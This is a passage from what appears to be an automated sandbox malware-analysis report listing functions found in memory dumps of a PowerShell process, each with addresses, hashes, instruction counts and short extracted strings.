                                                      • Instruction ID: 934c81fb173ba251cc0330dbd3025e217208a382a542cc21eded3423cf289b49
                                                      • Opcode Fuzzy Hash: b2767ee04c8d930612e45cc6bdedb3a1302ae151af963961c6f7d7d27045a1be
                                                      • Instruction Fuzzy Hash: 80927DB0A00218DFDB64DB24C954B9ABBB2FB84304F1184E5D9096B795CB71EEC6CF91
                                                      Function 02DFEBA0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm
                                                      • API String ID: 0-3272467948
                                                      • Opcode ID: a7c08666782989e12ad4fc8a4befe604a9bdfc43e8bd4dd522cb75ace1f53106
                                                      • Instruction ID: d5adc20e2cebec36303b17668f0a715952904e81fda4d532bde5c1f21cc9a8c2
                                                      • Opcode Fuzzy Hash: a7c08666782989e12ad4fc8a4befe604a9bdfc43e8bd4dd522cb75ace1f53106
                                                      • Instruction Fuzzy Hash: 74B16D71E002098FDB50CFA9D88579DBBF2AF88314F158129E919AB3A4EB749C45CF85
                                                      Function 02DFF470 Relevance: .3, Instructions: 266COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 800047b417b18e08dd843d3bb5f5040370376febec7daac7c888e057d109d10d
                                                      • Instruction ID: b7bd763984b00684bdb905f96136bfc868dc5fea1b58435ff1738a8b96198b16
                                                      • Opcode Fuzzy Hash: 800047b417b18e08dd843d3bb5f5040370376febec7daac7c888e057d109d10d
                                                      • Instruction Fuzzy Hash: B4B18D70E002098FDF60CFA8D88179DBBF2AF88714F158129D919EB794EB749C85CB85
                                                      Function 074D4F00 Relevance: 28.4, Strings: 22, Instructions: 924COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                      • API String ID: 0-3939933449
                                                      • Opcode ID: b78490b032436a65efb360a4dc0ee3a5780494700ab1f108ffb5a8ee35db1abf
                                                      • Instruction ID: 76d231c249d78d70c0fa27cac125d8f3f37c8c11ee98e5fb674f3692cf5bf550
                                                      • Opcode Fuzzy Hash: b78490b032436a65efb360a4dc0ee3a5780494700ab1f108ffb5a8ee35db1abf
                                                      • Instruction Fuzzy Hash: DE828FB0B00219DFDB14CF58C964BAABBF6BB85304F2485AAD5489F355CF31EC868B51
                                                      Function 074D7F90 Relevance: 13.5, Strings: 10, Instructions: 1048COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                      • API String ID: 0-2890353280
                                                      • Opcode ID: 150225864b4693136903b79877b6cb2109929eb69597bc2f96eade89d4277754
                                                      • Instruction ID: 550e981800f942b3bc307fc82e03875bde32dc85073225ca450f88bc7c272645
                                                      • Opcode Fuzzy Hash: 150225864b4693136903b79877b6cb2109929eb69597bc2f96eade89d4277754
                                                      • Instruction Fuzzy Hash: 4892A7B0A00215DFCB24CF58C961BABBBF6EF85304F1485AAD5459B355CB31EC86CB91
                                                      Function 074D507D Relevance: 13.2, Strings: 10, Instructions: 670COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-518715366
                                                      • Opcode ID: 82a84ed79b134247c5ec91e2117a831a9bb5efadcaed98ec34f5701fd6594d38
                                                      • Instruction ID: 2a81199f74dfe3d8639ff19dbaace7b66540d64968322e6c0c2e3773e0b32aa9
                                                      • Opcode Fuzzy Hash: 82a84ed79b134247c5ec91e2117a831a9bb5efadcaed98ec34f5701fd6594d38
                                                      • Instruction Fuzzy Hash: CD524DB4A00219DFDB24CF58C994FAAFBF6BB45304F24819AD948AB355CB31AD42CF51
                                                      Function 02DFB0B0 Relevance: 10.5, Strings: 8, Instructions: 518COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8NHm$Hbq$h]Hm$h]Hm$h]Hm$$^q$$^q$IHm
                                                      • API String ID: 0-2014077908
                                                      • Opcode ID: fd76ea5770703b774c89ea8db0a28e73cdc73d010ea646b36d5385d985f2ff8e
                                                      • Instruction ID: eaf2dcce50092fab81814fb1d8075bb03ed1bd4c5cd3a00f148998deefd9759b
                                                      • Opcode Fuzzy Hash: fd76ea5770703b774c89ea8db0a28e73cdc73d010ea646b36d5385d985f2ff8e
                                                      • Instruction Fuzzy Hash: DE228130B002188FCB69DB24C854BAEB7B6EF89744F1580A9D50AAB361DF34DD85CF85
                                                      Function 074D00F0 Relevance: 10.5, Strings: 8, Instructions: 453COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3865595929
                                                      • Opcode ID: 323bb9db6dbf7eff5b76e8a1ce902baaaf2093bebd26068d500d73b9ea8b94d3
                                                      • Instruction ID: e8f5582f289230b2f0676b76494ffd6b1d719a1ba1fc0d3d74179874260bb4ad
                                                      • Opcode Fuzzy Hash: 323bb9db6dbf7eff5b76e8a1ce902baaaf2093bebd26068d500d73b9ea8b94d3
                                                      • Instruction Fuzzy Hash: B7E15BB1B043159FCB158B6889247EBBBE2AF85310F1584ABD885CF365DA71CC45C7A2
                                                      Function 074D97B0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-2822668367
                                                      • Opcode ID: 486aa9c80269102abbebbe2d873c715be3c914a074fe68ce0ae5201ca6ec63e9
                                                      • Instruction ID: 9293ae744d3c293994ddc8ff1d3829758a96eb5194e2c2393a7a8476d809c8ca
                                                      • Opcode Fuzzy Hash: 486aa9c80269102abbebbe2d873c715be3c914a074fe68ce0ae5201ca6ec63e9
                                                      • Instruction Fuzzy Hash: 23D1A1B0A40208DFC714DB68C561B9EBBE2EF84704F11C46AD855AF365CF71EC868BA1
                                                      Function 06D51B22 Relevance: 6.9, Strings: 5, Instructions: 657COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-4202989938
                                                      • Opcode ID: 3fcf1c34e083db2386bc4b6e4df8dab1533d4c41b9ec7341ed8bbccf4f2927cb
                                                      • Instruction ID: a5e16cd4d6af7d45d0e06634acb8d731dacf9d179aa7da4b28a80fd3f4d54a75
                                                      • Opcode Fuzzy Hash: 3fcf1c34e083db2386bc4b6e4df8dab1533d4c41b9ec7341ed8bbccf4f2927cb
                                                      • Instruction Fuzzy Hash: 5F627DB4A40218DFDB24DB24CD54BAABBB2FB84304F1081E5D9196B755CB71AEC2CF91
                                                      Function 074D5C10 Relevance: 5.9, Strings: 4, Instructions: 865COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: b2a7843c6b41d7000c71e9b468335dd81dfa1b69926901cc0b2753b88648db3b
                                                      • Instruction ID: ebcd5b122fe55b116ebf63826dcbe000a04bdfd2b701de87c190f4f70ba4be9d
                                                      • Opcode Fuzzy Hash: b2a7843c6b41d7000c71e9b468335dd81dfa1b69926901cc0b2753b88648db3b
                                                      • Instruction Fuzzy Hash: 4D727DB4B00204DFC714CBA8C555B9ABBF6BB85304F21C56AD9499B356CB72EC42CF92
                                                      Function 074D1F20 Relevance: 5.6, Strings: 4, Instructions: 576COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: c584143a39d84b6179f931ac9b41be78459745967b81a508e60f5268f4c044e4
                                                      • Instruction ID: 39479d535bf231f3c49fc33e578c8f649071f5329d3f3a30d52b499d27238d19
                                                      • Opcode Fuzzy Hash: c584143a39d84b6179f931ac9b41be78459745967b81a508e60f5268f4c044e4
                                                      • Instruction Fuzzy Hash: B33280B4B00209EFC714CB98C555B9EBBE2BB85304F15C46AE9459F355CBB2EC82CB91
                                                      Function 074D9790 Relevance: 4.0, Strings: 3, Instructions: 272COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q
                                                      • API String ID: 0-1196845430
                                                      • Opcode ID: d8bf5e2c0703ee5b90dbcd0675a3dd772f1b2c78ff73a3a5acf44744e5efb572
                                                      • Instruction ID: 5b3c1588b95497150cc0b63e17fd6f35e94832b6f42ac7cbf47bab2b5f781002
                                                      • Opcode Fuzzy Hash: d8bf5e2c0703ee5b90dbcd0675a3dd772f1b2c78ff73a3a5acf44744e5efb572
                                                      • Instruction Fuzzy Hash: ABB19EB0A00209DFCB14CF54C551BEEBBB2EB84704F15C556D845AF365CB75EC868BA1
                                                      Function 074D5C06 Relevance: 3.3, Strings: 2, Instructions: 757COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: d6491a85a11e21a51129b4d91b0640f5d72e1bf46451617ce0757de93f194a2e
                                                      • Instruction ID: fdf03d6274ff6726491058082b5af0d24452869be88d919e6797356d0b213abc
                                                      • Opcode Fuzzy Hash: d6491a85a11e21a51129b4d91b0640f5d72e1bf46451617ce0757de93f194a2e
                                                      • Instruction Fuzzy Hash: B7628DB4A00204DFDB14CB98C551F9AB7B2FB89304F25C56AD9496B356CB72EC42CF82
                                                      Function 074D5BED Relevance: 3.2, Strings: 2, Instructions: 750COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 3762a1c06e978f254a3be5a3e4f11ddbf5f4d5cd5c4f43c2359f25a902b20747
                                                      • Instruction ID: f3e53aebe1502b7345f2021943f4368d538e047b576c9da6f586e92d8e9eb234
                                                      • Opcode Fuzzy Hash: 3762a1c06e978f254a3be5a3e4f11ddbf5f4d5cd5c4f43c2359f25a902b20747
                                                      • Instruction Fuzzy Hash: 7D628EB4A00204DFDB14CB98C551FAAB7B2FB85304F25C56AD9496B356CB72EC42CF92
                                                      Function 074D5E3A Relevance: 3.1, Strings: 2, Instructions: 622COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: d924a89368a40579fdc976e8f0bd009a0977fe65ebee9bba24fe2937407be999
                                                      • Instruction ID: c01fcc5e17b378bbcdafb4a3ce8dadbbd1df431ae2f6a28f7fb4d0a638ae1c4a
                                                      • Opcode Fuzzy Hash: d924a89368a40579fdc976e8f0bd009a0977fe65ebee9bba24fe2937407be999
                                                      • Instruction Fuzzy Hash: 58426EB4A00205DFDB14CB94C551F9ABBB2FB85304F25C56AD9496B356CB72EC42CF82
                                                      Function 074D65DC Relevance: 3.1, Strings: 2, Instructions: 568COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 5b963174b1345e0540ffd8a2f58c954369487c6d13186f72ef30cce65658d6be
                                                      • Instruction ID: 368f0a2ebaceb67dd4f316577b29da379048482a39684dc5add3b0dd62926430
                                                      • Opcode Fuzzy Hash: 5b963174b1345e0540ffd8a2f58c954369487c6d13186f72ef30cce65658d6be
                                                      • Instruction Fuzzy Hash: 3D3280B4A00205DFDB14CB94C551FAABBB2FB85344F21C5AAD9495B356CB72EC42CF82
                                                      Function 074D260F Relevance: 3.0, Strings: 2, Instructions: 529COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: cd018e7a404589da71341f15386e9e070466e3aa77781b3515da2b1dbe02481a
                                                      • Instruction ID: a18bde77684edb5f246cc711abfab0d295e27b6a43183b68d85b90827a82b306
                                                      • Opcode Fuzzy Hash: cd018e7a404589da71341f15386e9e070466e3aa77781b3515da2b1dbe02481a
                                                      • Instruction Fuzzy Hash: 55227DB4B00205EFDB14CB94C965B9ABBB2FF85304F14845AE9459F355CBB2EC82CB91
                                                      Function 074D1F05 Relevance: 3.0, Strings: 2, Instructions: 517COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: d1de5268bdda7cb7860c50ea6c497f9ace4de09db229d88b09bf9792ae0d9901
                                                      • Instruction ID: 3d0758597bf2042bb5f081e51f9c212691199e3c68e937503e499cdfc73d5368
                                                      • Opcode Fuzzy Hash: d1de5268bdda7cb7860c50ea6c497f9ace4de09db229d88b09bf9792ae0d9901
                                                      • Instruction Fuzzy Hash: B8227CB4B00205EFDB14CB54C961BDABBB2FB85304F15C05AE9499B355CBB2EC82CB81
                                                      Function 074D89A3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 454dc90cfbdca0e77aa39db9fb636ded862b453b5107add12cc4df2073c65537
                                                      • Instruction ID: 70513687118eb09a293b3d4c520477534bbc84056538f37d3481808ad55e338d
                                                      • Opcode Fuzzy Hash: 454dc90cfbdca0e77aa39db9fb636ded862b453b5107add12cc4df2073c65537
                                                      • Instruction Fuzzy Hash: C1F192B0A40214DFD714DB68C951FAABBF3AF94304F1085A6D9096F395CB71ED828F91
                                                      Function 06D50D7E Relevance: 2.9, Strings: 2, Instructions: 378COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: cf3b989535387255cca07501735ca1f42716826e992963bfe0d950381938edd7
                                                      • Instruction ID: 2662e43e7c31e28d706b6e9c234f713e4f6f49b455495557d3266fb9e6b5767a
                                                      • Opcode Fuzzy Hash: cf3b989535387255cca07501735ca1f42716826e992963bfe0d950381938edd7
                                                      • Instruction Fuzzy Hash: 50F1D370A402189FDB24DB68CD55B9ABBF2EB84304F1184A5D909AF7A5CB31DD82CF91
                                                      Function 02DFF1DC Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm$\VHm
                                                      • API String ID: 0-4104177699
                                                      • Opcode ID: 5d1cc8f9d5b38c2cfd15805fa91fefba6b9c28a4517d2f2c6099a2a01052a482
                                                      • Instruction ID: 715fa23c68a546d1553bc2b934760a066f6ebc723305766dfa49777b333db0fc
                                                      • Opcode Fuzzy Hash: 5d1cc8f9d5b38c2cfd15805fa91fefba6b9c28a4517d2f2c6099a2a01052a482
                                                      • Instruction Fuzzy Hash: B37169B0E002098FDF50CFA8D88079EBBF1BF48314F158129E959A7794DB749846CF95
                                                      Function 02DFF1E8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm$\VHm
                                                      • API String ID: 0-4104177699
                                                      • Opcode ID: 939ae698d6a3b354b0fdc0ed3be72b88138a8eca54de03c1717c87bb976698c8
                                                      • Instruction ID: aa31ea73754fb88ce5633eb0eb10936fa06f82650bf2232fab3b8e9d1e07eaff
                                                      • Opcode Fuzzy Hash: 939ae698d6a3b354b0fdc0ed3be72b88138a8eca54de03c1717c87bb976698c8
                                                      • Instruction Fuzzy Hash: EA716BB0E002099FDF50CFA9D88079EBBF2BF88314F158029E559A7794EB749846CF95
                                                      Function 02DFBD68 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h]Hm$IHm
                                                      • API String ID: 0-911805665
                                                      • Opcode ID: c7647c8fb4ef6d83426996345ce17535b6a2249e2a8796287d39c9af4f7b0753
                                                      • Instruction ID: 6f92bc7203590cb0a38f1b5fd7480d873a90625692154361cbb6c217c540f760
                                                      • Opcode Fuzzy Hash: c7647c8fb4ef6d83426996345ce17535b6a2249e2a8796287d39c9af4f7b0753
                                                      • Instruction Fuzzy Hash: A8316F30B041188FDF65DB64C894AEEB7B2AF89349F1144EAC50AAB355CB35DE81CF81
                                                      Function 074D04E0 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q
                                                      • API String ID: 0-355816377
                                                      • Opcode ID: 89c88d92f97c0b85b9bec3a9f03d4d666db0ab7a40572ab55b65a050a2a794d4
                                                      • Instruction ID: e414f5834f56e5021c6c5ff28fc3ca671bb2e1c823701f2db9ee2e081eba7ade
                                                      • Opcode Fuzzy Hash: 89c88d92f97c0b85b9bec3a9f03d4d666db0ab7a40572ab55b65a050a2a794d4
                                                      • Instruction Fuzzy Hash: D511E1F6E0021ADB8F24CE6985741EAB7F4AF48610F264927CC58EB314D630DD05CBA0
                                                      Function 02DFEB94 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm
                                                      • API String ID: 0-3272467948
                                                      • Opcode ID: c5bd42ab39b78b6ec2f809d402fb69d0ee945df241d55a7bb082b9ef297d06e6
                                                      • Instruction ID: 5bbba5c77379eec3cc2194ba3bdb6df17b66d9d1c0d7eb310d3e28a758b4ced6
                                                      • Opcode Fuzzy Hash: c5bd42ab39b78b6ec2f809d402fb69d0ee945df241d55a7bb082b9ef297d06e6
                                                      • Instruction Fuzzy Hash: 63B16B70E00209CFDB50CFA9D88579DBBF2AF48318F158129E919AB3A4EB749845CF85
                                                      Function 02DF2B48 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 451bcb4ccb04888edffc191a02a62cb842b1bd29ee3c5f275ac258f73fd2b186
                                                      • Instruction ID: a4cba34b9d44b59bfc230550c41a3e721fc706d90afe45bfd3e7abaf70a70850
                                                      • Opcode Fuzzy Hash: 451bcb4ccb04888edffc191a02a62cb842b1bd29ee3c5f275ac258f73fd2b186
                                                      • Instruction Fuzzy Hash: F3C1D0709093948FC706CF68C8A49EABFB1EF46314B194197D894DB3A6C335EC85CBA5
                                                      Function 02DF8F40 Relevance: .3, Instructions: 316COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d722548583c59582d53490a7eb464fd214bff0f217535db6ac91c0fe485567e
                                                      • Instruction ID: 8e486179178d76a35428bd63b3320d5d5f833d0cea9c9ea61ee9cb7e93902c24
                                                      • Opcode Fuzzy Hash: 7d722548583c59582d53490a7eb464fd214bff0f217535db6ac91c0fe485567e
                                                      • Instruction Fuzzy Hash: FEC18931E00208DFCB54DFA4D554A9DBBB6FF85314F168568E906AB3A5CB34EC89CB84
                                                      Function 02DF31C8 Relevance: .3, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ee1241bd10943bee8c708f68dcc2d387c7f661c58195f1612e743804119a0aa
                                                      • Instruction ID: 6c7b5f2570e788c9cef9550a2c3d1d89d4b6c6aaa254079e06d41b33b6deece3
                                                      • Opcode Fuzzy Hash: 6ee1241bd10943bee8c708f68dcc2d387c7f661c58195f1612e743804119a0aa
                                                      • Instruction Fuzzy Hash: B8D11A74A01248EFCB84CFA8D584A9DFBF2AF48314F26C195E845AB361C731ED85CB94
                                                      Function 074D7B88 Relevance: .3, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81ec360d55f582b97e9cf78e67871ed179c20dc16e13e07c6f1b9f5fefecc724
                                                      • Instruction ID: a1cce413112166befe788495fea58a300d8b63ef3de4ea88abbc8f4badf64aad
                                                      • Opcode Fuzzy Hash: 81ec360d55f582b97e9cf78e67871ed179c20dc16e13e07c6f1b9f5fefecc724
                                                      • Instruction Fuzzy Hash: 64B194B0B00205EFDB14DB68C565BAE7BF3AB89304F10846AD9156F395CB31EC86CB91
                                                      Function 074D7B69 Relevance: .3, Instructions: 269COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
